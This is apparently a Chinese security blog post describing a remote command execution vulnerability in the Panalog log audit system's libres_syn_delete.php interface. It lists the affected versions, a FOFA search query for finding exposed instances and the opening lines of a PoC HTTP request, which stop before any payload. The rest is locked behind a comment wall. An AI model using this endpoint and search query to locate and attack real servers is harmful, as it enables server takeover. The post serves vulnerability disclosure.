安全 web安全 Panalog 日志审计系统 libres

0x01 产品简介

Panalog是一款日志审计系统，方便用户统一集中监控、管理在网的海量设备。

0x02 漏洞概述

Panalog日志审计系统 libres_syn_delete.php接口处存在远程命令执行漏洞，攻击者可执行任意命令，接管服务器权限。

0x03 影响范围

version <= MARS r10p1Free

0x04 复现环境

FOFA：app="Panabit-Panalog"

0x05 漏洞复现

PoC

POST /content-apply/libres_syn_delete.php HTTP/1.1

Host: your-ip

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

Content-Type: application/x-w

相关链接

评论可见，请评论后查看内容，谢谢！！！

您阅读本篇文章共花了：

本文由用户于 2024-04-21 发布在金钥匙，如有疑问，请联系我们。
本文链接：https://www.51969.com/post/18786251.html

金钥匙